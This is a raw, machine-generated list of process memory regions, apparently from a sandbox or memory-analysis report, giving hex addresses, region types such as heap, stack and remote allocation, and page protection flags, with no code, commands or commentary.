heap
page read and write
453E000
heap
page read and write
299000
heap
page read and write
37B0000
heap
page read and write
31F000
heap
page read and write
86C000
heap
page read and write
10A000
heap
page read and write
1E10000
direct allocation
page read and write
1CD2D000
trusted library section
page read and write
2920000
trusted library allocation
page execute
21F2000
trusted library allocation
page read and write
1E37000
direct allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
27D5000
trusted library allocation
page read and write
276B000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
1C19C000
heap
page read and write
479C000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
3B70000
trusted library allocation
page read and write
4100000
heap
page read and write
3A5D000
trusted library allocation
page read and write
29D000
heap
page read and write
3B10000
trusted library allocation
page read and write
1A818000
stack
page read and write
7FE89946000
trusted library allocation
page read and write
32F4000
heap
page read and write
106000
heap
page read and write
1CDE6000
trusted library section
page read and write
1CCB0000
trusted library section
page read and write
4163000
heap
page read and write
1F2F000
stack
page read and write
1B490000
heap
page read and write
4B1000
heap
page read and write
60E000
heap
page read and write
49D9000
heap
page read and write
220000
trusted library allocation
page read and write
3E0000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
46EB000
heap
page read and write
33A7000
heap
page read and write
1CE39000
trusted library section
page read and write
1C0000
heap
page read and write
3C00000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
BB0000
heap
page read and write
12C31000
trusted library allocation
page read and write
47A1000
heap
page read and write
23EE000
trusted library allocation
page read and write
1A5AE000
heap
page execute and read and write
1F30000
direct allocation
page read and write
149000
heap
page read and write
40F000
heap
page read and write
19C000
stack
page read and write
3302000
heap
page read and write
2D90000
trusted library allocation
page read and write
2C8000
stack
page read and write
160000
trusted library allocation
page read and write
7FE89BAF000
trusted library allocation
page read and write
2DF000
heap
page read and write
2B0000
heap
page read and write
1CCFD000
trusted library section
page read and write
1FB0000
heap
page execute and read and write
2750000
remote allocation
page read and write
1A70C000
heap
page read and write
4A67000
heap
page read and write
47A3000
heap
page read and write
125D1000
trusted library allocation
page read and write
25EF000
stack
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
2FE7000
heap
page read and write
4EE000
heap
page read and write
7FE89A74000
trusted library allocation
page read and write
3FF000
heap
page read and write
2110000
heap
page execute and read and write
7FE89B10000
trusted library allocation
page read and write
216000
stack
page read and write
2F71000
heap
page read and write
1A679000
stack
page read and write
7FE89B30000
trusted library allocation
page read and write
47B000
heap
page read and write
47A5000
heap
page read and write
3140000
trusted library allocation
page read and write
21F2000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
2AD000
heap
page read and write
47C000
heap
page read and write
3D60000
trusted library allocation
page read and write
1D05C000
trusted library section
page read and write
7FE89AB0000
trusted library allocation
page read and write
30E000
heap
page read and write
1C30E000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
1CCAA000
trusted library section
page read and write
3B5000
heap
page read and write
2F2C000
heap
page read and write
1B05F000
stack
page read and write
37F000
heap
page read and write
7FE89A4C000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
2AD000
heap
page read and write
40F000
heap
page read and write
4711000
heap
page read and write
24EE000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
2FF5000
heap
page read and write
453C000
heap
page read and write
1CDDC000
trusted library section
page read and write
4757000
heap
page read and write
41F000
heap
page read and write
1DC000
stack
page read and write
5A8000
heap
page read and write
3A5D000
trusted library allocation
page read and write
4A5B000
heap
page read and write
1AD74000
heap
page read and write
4CE000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
39F0000
trusted library allocation
page read and write
400000
heap
page read and write
3370000
trusted library allocation
page read and write
1A29C000
stack
page read and write
7FE89BC0000
trusted library allocation
page read and write
276F000
trusted library allocation
page read and write
31C000
heap
page read and write
380000
heap
page read and write
32F4000
heap
page read and write
1B3B0000
heap
page read and write
4A3E000
heap
page read and write
4532000
heap
page read and write
46C0000
heap
page read and write
440000
heap
page read and write
1C3B0000
heap
page read and write
3A89000
trusted library allocation
page read and write
3A6000
heap
page read and write
1CEBF000
trusted library section
page read and write
7FE89A43000
trusted library allocation
page read and write
1CD1A000
trusted library section
page read and write
24D000
heap
page read and write
22B0000
heap
page read and write
441B000
heap
page read and write
4617000
heap
page read and write
10000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
3F8D000
heap
page read and write
257000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
7FE89A30000
trusted library allocation
page read and write
46C4000
heap
page read and write
1C2C5000
heap
page read and write
3A89000
trusted library allocation
page read and write
299000
heap
page read and write
2DE000
stack
page read and write
1ACC4000
heap
page read and write
1B2B0000
heap
page read and write
4A70000
heap
page read and write
2B0000
heap
page read and write
173000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
C00000
heap
page read and write
2E4000
heap
page read and write
165000
heap
page read and write
2FD5000
heap
page read and write
451000
heap
page read and write
1C570000
heap
page read and write
389A000
trusted library allocation
page read and write
1DE000
stack
page read and write
1ACB0000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1AA0B000
stack
page read and write
25B000
heap
page read and write
20000
heap
page read and write
1C1EB000
heap
page read and write
4EF000
heap
page read and write
1A720000
heap
page execute and read and write
2F8A000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
130000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
29A0000
trusted library allocation
page execute
10000
heap
page read and write
11E000
heap
page read and write
473000
system
page execute and read and write
3A5D000
trusted library allocation
page read and write
1AAE3000
heap
page read and write
32E1000
heap
page read and write
1DD0000
heap
page read and write
297B000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
49CF000
heap
page read and write
32BC000
heap
page read and write
21E3000
trusted library allocation
page read and write
2B0000
heap
page read and write
1AD5E000
stack
page read and write
3F5000
heap
page read and write
4776000
heap
page read and write
1A7EE000
heap
page execute and read and write
47A1000
heap
page read and write
37A000
heap
page read and write
4711000
heap
page read and write
1C1D6000
heap
page read and write
284F000
stack
page read and write
22DB000
trusted library allocation
page read and write
1B2DF000
stack
page read and write
1CDB6000
trusted library section
page read and write
1A7B8000
heap
page execute and read and write
200000
heap
page read and write
3B8E000
heap
page read and write
47A3000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
4714000
heap
page read and write
137000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
4A5B000
heap
page read and write
4B7000
heap
page read and write
1CEFB000
trusted library section
page read and write
2880000
trusted library allocation
page read and write
50D000
heap
page read and write
C11000
heap
page read and write
1A574000
heap
page execute and read and write
47A1000
heap
page read and write
1C8EF000
stack
page read and write
23F2000
trusted library allocation
page read and write
BC0000
heap
page read and write
3A7D000
trusted library allocation
page read and write
3940000
trusted library allocation
page read and write
7A7000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
1C32F000
heap
page read and write
174000
heap
page read and write
1AD1A000
heap
page read and write
336A000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
377000
heap
page read and write
3B24000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
338B000
heap
page read and write
2A4000
heap
page read and write
1E30000
heap
page read and write
1A52D000
stack
page read and write
152000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
23A0000
heap
page read and write
21ED000
trusted library allocation
page read and write
234B000
trusted library allocation
page read and write
258B000
trusted library allocation
page read and write
2B6000
heap
page read and write
273D000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
1B62B000
stack
page read and write
10000
heap
page read and write
18C000
heap
page read and write
3AB0000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
30E000
stack
page read and write
43AC000
heap
page read and write
1B56B000
heap
page read and write
4EB000
heap
page read and write
2B4000
heap
page read and write
10000
heap
page read and write
1A3000
heap
page read and write
125C1000
trusted library allocation
page read and write
4771000
heap
page read and write
28EF000
stack
page read and write
1CE91000
trusted library section
page read and write
2528000
trusted library allocation
page read and write
23F5000
trusted library allocation
page read and write
1AAEC000
heap
page read and write
46DB000
heap
page read and write
3A5D000
trusted library allocation
page read and write
22DF000
stack
page read and write
27C4000
trusted library allocation
page read and write
13F11000
trusted library allocation
page read and write
7EF000
heap
page read and write
2DB000
heap
page read and write
29D000
heap
page read and write
1C9000
heap
page read and write
242000
stack
page read and write
1C442000
heap
page read and write
3A94000
trusted library allocation
page read and write
3CE000
stack
page read and write
1C56000
heap
page read and write
109000
heap
page read and write
1CE3000
direct allocation
page read and write
1B2AF000
stack
page read and write
4661000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
1D60000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
334000
heap
page read and write
3690000
trusted library allocation
page read and write
4830000
heap
page read and write
336C000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4F5000
heap
page read and write
1BE0000
heap
page read and write
359000
heap
page read and write
176000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
4919000
heap
page read and write
1CE2F000
trusted library section
page read and write
448000
heap
page read and write
3E3000
heap
page read and write
3D9000
heap
page read and write
479000
heap
page read and write
26A3000
trusted library allocation
page read and write
249000
heap
page read and write
299000
heap
page read and write
1C431000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
518000
heap
page read and write
7FE89956000
trusted library allocation
page execute and read and write
7FE89B50000
trusted library allocation
page read and write
1CE33000
trusted library section
page read and write
7DC000
heap
page read and write
12CAA000
trusted library allocation
page read and write
23B3000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
1CF67000
trusted library section
page read and write
1A749000
stack
page read and write
1CE06000
trusted library section
page read and write
1A21E000
stack
page read and write
4A5C000
heap
page read and write
4A70000
heap
page read and write
2C0E000
stack
page read and write
4917000
heap
page read and write
5AC000
heap
page read and write
1B4000
heap
page read and write
7FE89950000
trusted library allocation
page execute and read and write
46DB000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
1D00A000
trusted library section
page read and write
7FE89C14000
trusted library allocation
page read and write
7FE89946000
trusted library allocation
page read and write
2B4000
heap
page read and write
314000
heap
page read and write
2791000
trusted library allocation
page read and write
25E000
heap
page read and write
31A000
heap
page read and write
5BE000
stack
page read and write
25C000
heap
page read and write
11E000
heap
page read and write
234000
stack
page read and write
453C000
heap
page read and write
4750000
heap
page read and write
49CF000
heap
page read and write
1DC4000
heap
page read and write
279A000
trusted library allocation
page read and write
28F000
heap
page read and write
4746000
heap
page read and write
3F2000
heap
page read and write
1ED0000
direct allocation
page read and write
1B4B5000
heap
page read and write
25C000
stack
page read and write
3A7D000
trusted library allocation
page read and write
141ED000
trusted library allocation
page read and write
1A62F000
stack
page read and write
7FE89B90000
trusted library allocation
page read and write
7FE89920000
trusted library allocation
page read and write
420000
heap
page read and write
4057000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
3B30000
trusted library allocation
page read and write
5AA000
heap
page read and write
47E000
heap
page read and write
137000
heap
page read and write
1DC5000
heap
page read and write
43A0000
heap
page read and write
1CFE5000
trusted library section
page read and write
554000
heap
page read and write
441B000
heap
page read and write
3A94000
trusted library allocation
page read and write
535000
heap
page read and write
182000
heap
page read and write
508000
heap
page read and write
5C0000
heap
page read and write
2FE6000
heap
page read and write
4776000
heap
page read and write
4CE000
heap
page read and write
4A6F000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
2BC0000
trusted library allocation
page read and write
122C1000
trusted library allocation
page read and write
515000
heap
page read and write
1C130000
heap
page read and write
4755000
heap
page read and write
380E000
heap
page read and write
1E6B000
heap
page read and write
171000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
35B0000
heap
page read and write
4E7000
heap
page read and write
3A5D000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
177000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
47A5000
heap
page read and write
37B1000
heap
page read and write
1A998000
stack
page read and write
23EE000
trusted library allocation
page read and write
4830000
heap
page read and write
1E43000
direct allocation
page read and write
27C0000
heap
page read and write
13C000
stack
page read and write
4778000
heap
page read and write
1A86E000
heap
page execute and read and write
7FE89B20000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
1D05E000
trusted library section
page read and write
4911000
heap
page read and write
3A5D000
trusted library allocation
page read and write
35F000
trusted library allocation
page read and write
1CCAE000
trusted library section
page read and write
27EE000
trusted library allocation
page read and write
1C1B5000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
179000
heap
page read and write
1CCFF000
trusted library section
page read and write
1CF97000
trusted library section
page read and write
319A000
stack
page read and write
1CE7000
direct allocation
page read and write
4400000
heap
page read and write
32D9000
heap
page read and write
1A7000
heap
page read and write
1CE97000
trusted library section
page read and write
1CFDD000
trusted library section
page read and write
3FF7000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
2D8A000
trusted library allocation
page read and write
580000
heap
page read and write
1C2BA000
stack
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
1CFD000
direct allocation
page read and write
4776000
heap
page read and write
4746000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
509000
heap
page read and write
1D3000
stack
page read and write
7FE89AA0000
trusted library allocation
page read and write
32BC000
heap
page read and write
47F0000
heap
page read and write
1CCBC000
trusted library section
page read and write
2FFC000
heap
page read and write
10000
heap
page read and write
1E0000
trusted library allocation
page read and write
1C3EF000
stack
page read and write
3CD0000
trusted library allocation
page read and write
46DB000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
2A2000
heap
page read and write
49E000
heap
page read and write
41F000
system
page execute and read and write
4FA000
heap
page read and write
4EF000
heap
page read and write
2BE000
heap
page read and write
378000
heap
page read and write
1F90000
heap
page read and write
1A8B8000
stack
page read and write
3F9000
heap
page read and write
7FE89A78000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
2763000
trusted library allocation
page read and write
509000
heap
page read and write
3940000
trusted library allocation
page read and write
1AA88000
stack
page read and write
3A89000
trusted library allocation
page read and write
1A578000
heap
page execute and read and write
1CE8F000
trusted library section
page read and write
405D000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
1AC2E000
heap
page read and write
14A69000
trusted library allocation
page read and write
7FE89A32000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
1AE0F000
stack
page read and write
24D1000
trusted library allocation
page read and write
476B000
heap
page read and write
3FB7000
heap
page read and write
1B196000
heap
page read and write
3344000
heap
page read and write
179000
heap
page read and write
21AE000
stack
page read and write | page guard
2129000
trusted library allocation
page read and write
46DB000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
2300000
trusted library allocation
page read and write
20000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
1AD50000
heap
page read and write
2FE0000
heap
page read and write
2772000
trusted library allocation
page read and write
13B000
heap
page read and write
5E4000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
24D1000
trusted library allocation
page read and write
5AC000
heap
page read and write
2540000
heap
page execute and read and write
453A000
heap
page read and write
2793000
trusted library allocation
page read and write
1B3A0000
heap
page read and write
453A000
heap
page read and write
163000
stack
page read and write
1AAB9000
heap
page read and write
1CD2B000
trusted library section
page read and write
32D6000
heap
page read and write
1B47F000
stack
page read and write
7FE89A4C000
trusted library allocation
page read and write
1C00000
heap
page read and write
20000
heap
page read and write
2000000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
2FDB000
heap
page read and write
C0000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
2C3000
stack
page read and write
4168000
heap
page read and write
338D000
trusted library allocation
page read and write
3A8F000
trusted library allocation
page read and write
453000
heap
page read and write
37E000
heap
page read and write
76A000
heap
page read and write
2770000
trusted library allocation
page read and write
1CE31000
trusted library section
page read and write
7FE89960000
trusted library allocation
page execute and read and write
1C5FE000
stack
page read and write
299000
heap
page read and write
270000
heap
page read and write
1B4B0000
heap
page read and write
1C2B0000
heap
page read and write
2997000
trusted library allocation
page read and write
4B5000
heap
page read and write
7FE89893000
trusted library allocation
page execute and read and write
27D000
heap
page read and write
1CED0000
trusted library section
page read and write
1CE37000
trusted library section
page read and write
1A239000
heap
page read and write
4750000
heap
page read and write
36C000
stack
page read and write
18C000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
514000
heap
page read and write
122A1000
trusted library allocation
page read and write
1B5BC000
stack
page read and write
7FE89C60000
trusted library allocation
page read and write
3FD000
heap
page read and write
3CA000
heap
page read and write
3007000
heap
page read and write
1E0000
trusted library allocation
page read and write
1C2C0000
heap
page read and write
46DB000
heap
page read and write
1C2D3000
heap
page read and write
347000
heap
page read and write
3B0000
heap
page read and write
258000
heap
page read and write
23FD000
trusted library allocation
page read and write
4054000
heap
page read and write
1CF8D000
trusted library section
page read and write
4776000
heap
page read and write
4C3000
heap
page read and write
2B0000
heap
page read and write
2B0000
heap
page read and write
1E0D000
stack
page read and write
23FA000
trusted library allocation
page read and write
7FE89A27000
trusted library allocation
page read and write
47A5000
heap
page read and write
4C9000
heap
page read and write
427000
heap
page read and write
2E5E000
stack
page read and write
170000
trusted library allocation
page read and write
26000
heap
page read and write
1B1B4000
heap
page read and write
52D000
heap
page read and write
49D3000
heap
page read and write
46C0000
heap
page read and write
1D016000
trusted library section
page read and write
226000
stack
page read and write
37A0000
heap
page read and write
4A65000
heap
page read and write
47A5000
heap
page read and write
12D000
heap
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
7FE89BA7000
trusted library allocation
page read and write
23FC000
trusted library allocation
page read and write
21B000
stack
page read and write
4778000
heap
page read and write
147000
heap
page read and write
441B000
heap
page read and write
4516000
heap
page read and write
1CD01000
trusted library section
page read and write
3661000
heap
page read and write
1D26000
heap
page read and write
43A8000
heap
page read and write
1AE40000
heap
page read and write
130000
heap
page read and write
20000
heap
page read and write
2DD000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
1CDE4000
trusted library section
page read and write
1CA3000
direct allocation
page read and write
241E000
heap
page read and write
280000
heap
page read and write
459000
system
page execute and read and write
3A7D000
trusted library allocation
page read and write
1CA2F000
stack
page read and write
21E9000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
1CE77000
trusted library section
page read and write
3660000
heap
page read and write
1E50000
heap
page read and write
14B000
heap
page read and write
509000
heap
page read and write
250000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
1AB51000
heap
page read and write
5AD000
heap
page read and write
2F71000
heap
page read and write
3F8E000
stack
page read and write
36E000
heap
page read and write
10000
heap
page read and write
49D1000
heap
page read and write
3A5D000
trusted library allocation
page read and write
F90000
heap
page read and write
5AC000
heap
page read and write
20000
heap
page read and write
1CFAC000
trusted library section
page read and write
2DB000
stack
page read and write
331000
heap
page read and write
25B000
heap
page read and write
32B000
heap
page read and write
B2E000
stack
page read and write
31E000
heap
page read and write
4A6A000
heap
page read and write
3315000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
14BAB000
trusted library allocation
page read and write
33A6000
heap
page read and write
1B360000
heap
page read and write
474000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
D0000
heap
page read and write
4EE000
heap
page read and write
33A6000
heap
page read and write
2B0000
heap
page read and write
4661000
heap
page read and write
1C3A5000
heap
page read and write
46CA000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
7FE89AA0000
trusted library allocation
page read and write
137ED000
trusted library allocation
page read and write
1E37000
direct allocation
page read and write
3AF000
heap
page read and write
37C000
heap
page read and write
17C000
heap
page read and write
225F000
stack
page read and write
177000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
1AD4C000
heap
page read and write
4A3B000
heap
page read and write
241A000
heap
page read and write
4714000
heap
page read and write
26D2000
trusted library allocation
page read and write
1CE0000
direct allocation
page read and write
3AC0000
trusted library allocation
page read and write
7FE89A43000
trusted library allocation
page read and write
7FE89873000
trusted library allocation
page execute and read and write
47A1000
heap
page read and write
10000000
direct allocation
page read and write
2F95000
heap
page read and write
36E000
heap
page read and write
7FE89883000
trusted library allocation
page read and write
1D029000
trusted library section
page read and write
2591000
trusted library allocation
page read and write
7FE89874000
trusted library allocation
page read and write
1CF45000
trusted library section
page read and write
2B4000
heap
page read and write
278E000
trusted library allocation
page read and write
1CF23000
trusted library section
page read and write
24A0000
heap
page read and write
2FE6000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
10000
heap
page read and write
1E35000
heap
page read and write
1AACE000
heap
page read and write
4A67000
heap
page read and write
1CF8B000
trusted library section
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
1AE3F000
stack
page read and write
232000
stack
page read and write
1CE0C000
trusted library section
page read and write
3A7D000
trusted library allocation
page read and write
2832000
trusted library allocation
page read and write
2993000
trusted library allocation
page read and write
1C84F000
stack
page read and write
1A74B000
heap
page read and write
1CE0000
heap
page read and write
4A3E000
heap
page read and write
441C000
heap
page read and write
178000
heap
page read and write
110000
heap
page read and write
1C2C4000
heap
page read and write
596000
heap
page read and write
30000
heap
page read and write
2EC000
heap
page read and write
1A6F0000
heap
page read and write
2B4000
heap
page read and write
51E000
stack
page read and write
21EB000
trusted library allocation
page read and write
40AE000
heap
page read and write
1EB0000
heap
page read and write
690000
heap
page read and write
1C359000
heap
page read and write
15C000
heap
page read and write
36E000
heap
page read and write
12A5E000
trusted library allocation
page read and write
18D000
heap
page read and write
A80000
heap
page read and write
3B74000
trusted library allocation
page read and write
114000
heap
page read and write
4A65000
heap
page read and write
2767000
trusted library allocation
page read and write
24C000
heap
page read and write
1CEE6000
trusted library section
page read and write
149000
heap
page read and write
22D3000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
2EE000
heap
page read and write
5A5000
heap
page read and write
2B4000
heap
page read and write
47F000
heap
page read and write
2B0000
heap
page read and write
7FE89A98000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
21E7000
trusted library allocation
page read and write
24CE000
stack
page read and write | page guard
132000
heap
page read and write
20000
heap
page read and write
279C000
trusted library allocation
page read and write
1CBF000
direct allocation
page read and write
3A5D000
trusted library allocation
page read and write
23FA000
trusted library allocation
page read and write
490000
heap
page read and write
1E50000
heap
page read and write
4778000
heap
page read and write
1B134000
heap
page read and write
4618000
heap
page read and write
2E52000
trusted library allocation
page read and write
137000
heap
page read and write
2EA9000
trusted library allocation
page read and write
334000
heap
page read and write
1C158000
heap
page read and write
3A8F000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
339B000
heap
page read and write
47A5000
heap
page read and write
149000
heap
page read and write
255000
heap
page read and write
49B000
heap
page read and write
4399000
heap
page read and write
339B000
heap
page read and write
33AF000
heap
page read and write
4B6000
heap
page read and write
10000
heap
page read and write
188000
heap
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
2774000
trusted library allocation
page read and write
20000
heap
page read and write
27D3000
trusted library allocation
page read and write
4B4000
heap
page read and write
2F8C000
heap
page read and write
2410000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
339B000
heap
page read and write
4A06000
heap
page read and write
1B060000
heap
page read and write
7FE89893000
trusted library allocation
page execute and read and write
2792000
trusted library allocation
page read and write
4771000
heap
page read and write
2F1C000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
2C6E000
stack
page read and write
3A7D000
trusted library allocation
page read and write
1CBB000
direct allocation
page read and write
48E1000
heap
page read and write
1CE23000
trusted library section
page read and write
225E000
stack
page read and write | page guard
3B6F000
trusted library allocation
page read and write
289000
heap
page read and write
250000
heap
page read and write
2F6000
heap
page read and write
830000
heap
page read and write
7FE89950000
trusted library allocation
page execute and read and write
4C4000
heap
page read and write
4719000
heap
page read and write
20000
heap
page read and write
7FE8992C000
trusted library allocation
page execute and read and write
21ED000
trusted library allocation
page read and write
7FE89C50000
trusted library allocation
page read and write
1C03F000
stack
page read and write
CB8000
heap
page read and write
1CFC5000
trusted library section
page read and write
4AD000
heap
page read and write
50C000
heap
page read and write
4DA000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
7FE89AE0000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
3ABF000
stack
page read and write
7FE89950000
trusted library allocation
page read and write
2796000
trusted library allocation
page read and write
46DB000
heap
page read and write
3A7D000
trusted library allocation
page read and write
279A000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page read and write
1A60E000
stack
page read and write
32B0000
heap
page read and write
3C3000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
1CFEB000
trusted library section
page read and write
23E8000
trusted library allocation
page read and write
453F000
heap
page read and write
32BD000
heap
page read and write
46DB000
heap
page read and write
476B000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
279A000
trusted library allocation
page read and write
1CD9B000
trusted library section
page read and write
1A75E000
heap
page execute and read and write
441C000
heap
page read and write
3490000
trusted library allocation
page read and write
23E5000
trusted library allocation
page read and write
45E1000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
29CC000
trusted library allocation
page read and write
4C45000
heap
page read and write
474000
heap
page read and write
49D7000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
3700000
trusted library allocation
page read and write
2777000
trusted library allocation
page read and write
110000
heap
page read and write
43AB000
heap
page read and write
4A22000
heap
page read and write
144000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
620000
heap
page read and write
1CD05000
trusted library section
page read and write
34AD000
trusted library allocation
page read and write
2160000
heap
page read and write
37F000
heap
page read and write
4EC0000
heap
page read and write
2F24000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
18C000
stack
page read and write
441B000
heap
page read and write
570000
heap
page read and write
3710000
heap
page read and write
2788000
trusted library allocation
page read and write
4DF000
heap
page read and write
546000
heap
page read and write
43A8000
heap
page read and write
1BD6000
heap
page read and write
1CFDF000
trusted library section
page read and write
286000
heap
page read and write
14CED000
trusted library allocation
page read and write
343000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
1CE2D000
trusted library section
page read and write
1BA0000
heap
page read and write
1B355000
heap
page read and write
3A7D000
trusted library allocation
page read and write
1CDFB000
trusted library section
page read and write
1AFF6000
heap
page read and write
BCC000
stack
page read and write
334000
heap
page read and write
5AD000
heap
page read and write
4A22000
heap
page read and write
37F000
heap
page read and write
3A8F000
trusted library allocation
page read and write
52D000
heap
page read and write
2AD000
heap
page read and write
1D40000
direct allocation
page read and write
2885000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
17D000
heap
page read and write
541000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
1CD2F000
trusted library section
page read and write
2FE2000
heap
page read and write
524000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
4A22000
heap
page read and write
1B54E000
stack
page read and write
299000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
340000
heap
page read and write
1A570000
heap
page execute and read and write
120D1000
trusted library allocation
page read and write
4771000
heap
page read and write
2765000
trusted library allocation
page read and write
7FE89892000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
25E000
heap
page read and write
4D1000
heap
page read and write
3F71000
heap
page read and write
46C3000
heap
page read and write
4403000
heap
page read and write
22F000
stack
page read and write
288B000
trusted library allocation
page read and write
1ACC8000
heap
page read and write
1B0000
heap
page read and write
56F000
heap
page read and write
2916000
trusted library allocation
page read and write
1295E000
trusted library allocation
page read and write
1CD07000
trusted library section
page read and write
2772000
trusted library allocation
page read and write
1FF000
heap
page read and write
121E1000
trusted library allocation
page read and write
56E000
heap
page read and write
1C36000
heap
page read and write
4A3B000
heap
page read and write
21F2000
trusted library allocation
page read and write
4830000
heap
page read and write
32F4000
heap
page read and write
21E9000
trusted library allocation
page read and write
4BA000
heap
page read and write
2527000
trusted library allocation
page read and write
2785000
trusted library allocation
page read and write
7FE898AB000
trusted library allocation
page read and write
12101000
trusted library allocation
page read and write
1CCBE000
trusted library section
page read and write
2DF000
heap
page read and write
297D000
trusted library allocation
page read and write
2B4000
heap
page read and write
CAF000
stack
page read and write
1CA0000
direct allocation
page read and write
1C60000
direct allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
4A6A000
heap
page read and write
830000
heap
page read and write
3D90000
heap
page read and write
1298E000
trusted library allocation
page read and write
2B4000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
46F000
heap
page read and write
3344000
heap
page read and write
59E000
heap
page read and write
32F4000
heap
page read and write
25E000
heap
page read and write
46DB000
heap
page read and write
5F0000
heap
page read and write
1CF12000
trusted library section
page read and write
1AD2F000
heap
page read and write
1C600000
heap
page read and write
2512000
trusted library allocation
page read and write
1CFC9000
trusted library section
page read and write
3A7D000
trusted library allocation
page read and write
4778000
heap
page read and write
24DB000
heap
page read and write
279A000
trusted library allocation
page read and write
4166000
heap
page read and write
299000
heap
page read and write
3D72000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
2FF000
heap
page read and write
1CE9B000
trusted library section
page read and write
3290000
heap
page read and write
694000
heap
page read and write
5E8000
heap
page read and write
3010000
trusted library allocation
page read and write
1CDB8000
trusted library section
page read and write
2FFC000
heap
page read and write
4A6A000
heap
page read and write
CD6000
heap
page read and write
3A7D000
trusted library allocation
page read and write
1D20000
direct allocation
page read and write
1CD53000
trusted library section
page read and write
2D9000
heap
page read and write
4D7000
heap
page read and write
28A3000
trusted library allocation
page read and write
4A6A000
heap
page read and write
43A1000
heap
page read and write
4167000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
224F000
stack
page read and write
233000
heap
page read and write
5F0000
heap
page read and write
46F000
heap
page read and write
4715000
heap
page read and write
2BBE000
stack
page read and write
10000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
3A5D000
